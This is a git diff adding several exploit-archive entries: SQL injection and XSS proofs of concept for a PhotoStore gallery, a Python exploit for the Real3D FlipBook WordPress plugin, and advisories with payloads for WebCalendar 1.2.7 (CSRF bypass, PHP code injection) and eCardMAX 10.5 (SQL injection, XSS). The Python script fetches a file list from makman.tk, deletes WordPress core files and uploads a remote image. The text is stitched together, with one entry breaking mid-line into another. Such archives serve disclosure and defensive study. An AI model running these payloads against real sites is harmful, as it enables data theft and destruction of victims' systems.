+# The vulnerable parameter is “gallerySortType” which is not sanitized and sent by the user in order retrieve the gallery objects ordered by ASC or DESC in sql query.
+# Request Data #1 is:
+
+POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
+Cache-Control: no-cache
+Referer: http://www.example.net/photostore/gallery/Objects/24/page1/
+Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
+Accept-Language: en-us,en;q=0.5
+Host: www.ktoolsdemos.net
+Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
+Accept-Encoding: gzip, deflate
+Content-Length: 221
+Content-Type: application/x-www-form-urlencoded
+
+postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,[SQL_PAYLOAD]
+
+# Inserted payload for example:
+postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,(SELECT 9713 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(9713=9713,1))),0x7178717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+
+###
+#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
+###
+# The vulnerable parameter is “gallerySortBy” which is not sanitized and sent by the user in order retrieve the gallery objects selected by kind-of-type in sql query.
+# Request Data #2 is:
+
+POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
+Cache-Control: no-cache
+Referer: http://server/photostore/gallery/Objects/24/page1/
+Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
+Accept-Language: en-us,en;q=0.5
+Host: server
+Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
+Accept-Encoding: gzip, deflate
+Content-Length: 57
+Content-Type: application/x-www-form-urlencoded
+
+postGalleryForm=1&gallerySortBy=id[SQL_PAYLOAD]&gallerySortType=asc
+
+# Inserted payload for example:
+postGalleryForm=1&gallerySortBy=id AND (SELECT 7522 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7522=7522,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&gallerySortType=asc
+
+
+
+# Cross Site Scripting Proof—Of-Concept
+#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
+# XSS (Severity is Medium)
+# The vulnerable parameter is “mediaID” in “workbox.php” file and the parameter “password” in “/mgr.login.php” file which is not sanitized and sent by the user to the application
+#
+# In Order to exploit this vulnerability, the URL should be like the following examples:
+#
+# http://server/photostore/workbox.php?mode=addToLightbox&mediaID=“>
+# http://server/photostore/manager/mgr.login.php?username=demo&password='>alert(/makman/)'}
+ imageUrl = 'http://makman.tk/makman.jpg'
+ wpFilesUrl = 'http://makman.tk/wpFiles.json'
+
+ def __init__(self, url):
+ url = url.rstrip('/')
+ if 'http://' in url or 'https://' in url:
+ self.url = url
+ else:
+ self.url = 'http://' + url
+
+ def http(self, url, data = {}, post = False):
+ try:
+ if post:
+ r = requests.post(url, data = data, headers = self.headers, timeout = 20)
+ else:
+ r = requests.get(url, params = data, headers = self.headers, timeout = 20)
+ except:
+ exit('[-] Something went wrong. Please check your internet connection')
+ return r
+
+ def deleteFiles(self):
+ print('[+] Loading Wordpress file structure')
+ r = self.http(self.wpFilesUrl)
+ wpFiles = json.loads(r.text)
+ print('[+] Wordpress File structure loaded successfully')
+ print('[+] Creating directory real3dflipbook')
+ r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', {'imgbase' : 'makman'}, True)
+ print('[+] Deleting Files from wp-includes/ & wp-admin/')
+ for wpFile in wpFiles['wpFiles']:
+ print(' [+] Deleting File ' + wpFile)
+ self.payload1['deleteBook'] = wpFile
+ r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload1, True)
+ print('[+] Files have been deleted successfully')
+
+ def uploadImage(self):
+ print('[+] Loading image file')
+ r = self.http('http://makman.tk/makman.jpg')
+ encodedImage = base64.b64encode(r.content)
+ self.payload2['imgbase'] = ';,' + encodedImage.decode('utf-8')
+ print('[+] Uploading image file in target root directory')
+ r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload2, True)
+ print('[+] Image has been uploaded here ' + self.url + '/' + self.payload2['pageName'] + '.jpg')
+
+ def xss(self):
+ print('[+] Checking XSS payload')
+ r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php', self.payload3)
+ if self.payload3['bookId'] in r.text:
+ print('[+] Found XSS here :')
+ print(' [+] ' + self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php?action=' + self.payload3['action'] + '&bookId=' + self.payload3['bookId'])
+
+#########################################################################################################
+
+def banner():
+ os.system('cls' if os.name == 'nt' else 'clear')
+ tabs = ' '
+ print(tabs + '*******************************************************************')
+ print(tabs + '* [+] [POC][Exploit] CodeCanyon Real3D FlipBook WordPress Plugin *')
+ print(tabs + '* [+] Multiple Vulnerabilities Found by: *')
+ print(tabs + '* [+] https://mukarramkhalid.com *')
+ print(tabs + '*******************************************************************\n\n')
+
+def main():
+ banner()
+ url = input('[+] Enter Url\n[+] E.g. http://server or http://server/wordpress\n[+] ')
+ exploit = wpFlipbook(url)
+ exploit.deleteFiles()
+ exploit.uploadImage()
+ exploit.xss()
+ print('[+] Done')
+
+if __name__ == '__main__':
+ try:
+ main()
+ except KeyboardInterrupt:
+ exit('\n[-] CTRL-C detected.\n')
+# End
\ No newline at end of file
diff --git a/platforms/php/webapps/40057.txt b/platforms/php/webapps/40057.txt
new file mode 100755
index 000000000..406c391be
--- /dev/null
+++ b/platforms/php/webapps/40057.txt
@@ -0,0 +1,269 @@
+[+] Credits: John Page aka HYP3RLINX
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt
+
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+==========================
+www.k5n.us/webcalendar.php
+
+
+
+Product:
+==================
+WebCalendar v1.2.7
+
+WebCalendar is a PHP-based calendar application that can be configured as a
+single-user calendar, a multi-user calendar for groups of users, or as an
+event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2,
+Interbase, MS SQL Server, or ODBC is required.
+
+WebCalendar can be setup in a variety of ways, such as...
+
+A schedule management system for a single person
+A schedule management system for a group of people, allowing one or more
+assistants to manage the calendar of another user
+An events schedule that anyone can view, allowing visitors to submit new
+events
+A calendar server that can be viewed with iCalendar-compliant calendar
+applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or
+RSS-enabled
+applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.
+
+
+
+
+Vulnerability Type:
+======================
+CSRF PROTECTION BYPASS
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Vulnerability Details:
+=====================
+
+WebCalendar attempts to uses the HTTP Referer to check that requests are
+originating from same server as we see below.
+
+From WebCalendar "include/functions.php" file on line 6117:
+
+////////////////////////////////////////////////////////////
+
+function require_valide_referring_url ()
+{
+
+ global $SERVER_URL;
+
+
+if ( empty( $_SERVER['HTTP_REFERER'] ) ) {
+
+ // Missing the REFERER value
+
+ //die_miserable_death ( translate ( 'Invalid referring URL' ) );
+
+ // Unfortunately, some version of MSIE do not send this info.
+
+ return true;
+ }
+
+if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) {
+
+ // Gotcha. URL of referring page is not the same as our server.
+
+// This can be an instance of XSRF.
+
+// (This may also happen when more than address is used for your server.
+
+// However, you're not supposed to do that with this version of
+
+// WebCalendar anyhow...)
+ die_miserable_death ( translate ( 'Invalid referring URL' ) );
+
+ }
+
+}
+
+/////////////////////////////////////////////////////////////////////////////////////////
+
+However, this can be easily defeated by just not sending a referer. HTML 5
+includes a handy tag to omit the
+referer
+when making an HTTP request, currently supported in Chrome, Safari,
+MobileSafari and other WebKit-based browsers. Using this meta tag we send
+no referrer
+and the vulnerable application will then happily process our CSRF requests.
+
+
+
+Exploit code(s):
+===============
+
+1) CSRF Protection Bypass to change Admin password POC. Note: Name of the
+victim user is required for success.
+
+
+
+
+
+
+
+2) CSRF Protection Bypass modify access controls under "System Settings" /
+"Allow public access"
+
+
+
+
+
+
+#######################################################
+
+Vulnerability Type:
+======================
+PHP Code Injection
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Vulnerability Details:
+=====================
+
+Since WebCalendars install script is not removed after installation as
+there is no "automatic" removal of it, low privileged users can inject
+arbitrary
+PHP code for the "Database Cache" directory value as no input validation
+exists for this when a user installs the application using the WebCalendar
+walk
+thru wizard.
+
+If WebCalendars installation script is available as part of a default
+image, often as a convenience by some hosting providers, this can be used
+to gain
+code execution on the target system. The only item that is required is the
+user must have privileges to authenticate to the MySQL Database and to run
+the
+install script. So, users who have install wizard access for the
+WebCalendar application will now have ability to launch arbitrary system
+commands on the
+affected host.
+
+One problem we must overcome is WebCalendar filters quotes " so we cannot
+use code like However, we can defeat
+this
+obstacle using the all to forgotten backtick `CMD` operator!.
+
+e.g.
+
+*/?>
+
+This results in "settings.php" being injected like...
+
+
+readonly: false
+user_inc: user.php
+use_http_auth: false
+single_user: false
+# end settings.php */
+?>
+
+
+
+Exploitation steps(s):
+=====================
+
+1) Login to the WebCalendar Installation Wizard.
+
+2) When you get to WebCalendar Installation Wizard Step 2 of the install
+script.
+http://localhost/WebCalendar-1.2.7/WebCalendar-1.2.7/install/index.php?action=switch&page=2
+
+3) Click "Test Settings" button to ensure connection to the Database.
+4) Enter below PHP code for the "Database Cache Directory:" input fields
+value to pop calculator for POC (Windows).
+
+*/?>
+
+5) Click "Next" button
+6) Click "Next" button
+7) Click "Save settings" button
+
+BOOOOOOOM! "settings.php" gets overwritten and injected with our PHP code.
+
+If you happen to get following error when clicking "Test Settings" button,
+"Failure Reason: Database Cache Directory does not exist", just click back
+button then forward or just "Test settings" button again to try get past
+the error.
+
+
+Disclosure Timeline:
+===============================
+Vendor Notification: No replies
+July 4, 2016 : Public Disclosure
+
+
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+
+Severity Level:
+================
+6.8 (Medium)
+CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the
+information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author
+prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+HYP3RLINX
diff --git a/platforms/php/webapps/40058.txt b/platforms/php/webapps/40058.txt
new file mode 100755
index 000000000..30405c510
--- /dev/null
+++ b/platforms/php/webapps/40058.txt
@@ -0,0 +1,98 @@
+eCardMAX 10.5 SQL Injection and XSS Vulnerabilities
+
+
+[Software]
+
+- eCardMAX 10.5
+
+
+[Vendor]
+
+- eCardMAX.COM - http://www.ecardmax.com/
+
+
+[Vendor Product Description]
+
+- eCardMax is the most trusted, powerful and dynamic online ecard software solution. It enables you to create your
+own ecard website with many of the advanced features found on other major sites. Starting your own ecard website
+with eCardMax is fast and easy.
+
+
+[Advisory Timeline]
+
+- 13/06/2016 -> Vulnerability discovered;
+- 13/06/2016 -> First contact with vendor;
+- 13/06/2016 -> Vendor responds asking for details;
+- 14/06/2016 -> Vulnerability details sent to the vendor;
+- 17/06/2016 -> Vendor working on a patch;
+- 28/06/2016 -> Vendor Releases Patch
+- 01/07/2016 -> Public Security Advisory Published
+
+
+[Bug Summary]
+
+- SQL Injection
+
+- Cross Site Scripting (Reflected)
+
+
+[Impact]
+
+- High
+
+
+[Affected Version]
+
+- v10.5
+
+
+[Tested on]
+
+- Apache/2.2.26
+- PHP/5.3.28
+- MySQL/5.5.49-cll
+
+
+[Bug Description and Proof of Concept]
+
+- eCardMAX suffers from a SQL Injection vulnerability. Input passed via the 'row_number' GET parameter is not properly
+sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting
+arbitrary SQL code.
+
+- Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed via multiple parameters
+is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's
+browser session in context of an affected site.
+
+
+[Proof-of-Concept]
+
+1. SQL Injection:
+
+Parameter: row_number (GET)
+POC URL:
+http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%20order%20by%201--&search_year=2016&page=2
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+2. Cross Site Scripting (Reflected):
+
+http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=all&keyword=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cmd_button=Search+User
+Parameter(s): keyword (GET)
+
+http://localhost/ecardmaxdemo/admin/index.php?step=admin_cellphone_carrier&row_number=15&page=14%22%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
+Parameter(s): page (GET)
+
+http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search_year=2016&page=2
+Parameter(s): row_number (GET)
+
+http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display_inactive_account&what=&row_number=15&what2=&cmd_button=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&list_item=%3C/script%3E%3Cscript%3Ealert(2)%3C/script%3E&search_field=%3C/script%3E%3Cscript%3Ealert(3)%3C/script%3E&keyword=&num_day=%3C/script%3E%3Cscript%3Ealert(4)%3C/script%3E&num_what=%3C/script%3E%3Cscript%3Ealert(5)%3C/script%3E&from_month=%3C/script%3E%3Cscript%3Ealert(6)%3C/script%3E&from_day=%3C/script%3E%3Cscript%3Ealert(7)%3C/script%3E&from_year=%3C/script%3E%3Cscript%3Ealert(8)%3C/script%3E&to_day=%3C/script%3E%3Cscript%3Ealert(9)%3C/script%3E&to_month=%3C/script%3E%3Cscript%3Ealert(10)%3C/script%3E&to_year=%3C/script%3E%3Cscript%3Ealert(11)%3C/script%3E&page=2%3C/script%3E%3Cscript%3Ealert(12)%3C/script%3E
+Parameter(s): cmd_button, list_item, search_field, num_day, num_what, from_month, from_day, from_year, to_day, to_month, to_year, page (GET)
+
+http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=user_name_id&cmd_button=Search+User&keyword=833981213299707%22%3E%3Cscript%3Ealert(1)%3C/script%3E
+Parameter(s): keyword (GET)
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+All flaws described here were discovered and researched by:
+
+Bikramaditya Guha aka "PhoenixX"
\ No newline at end of file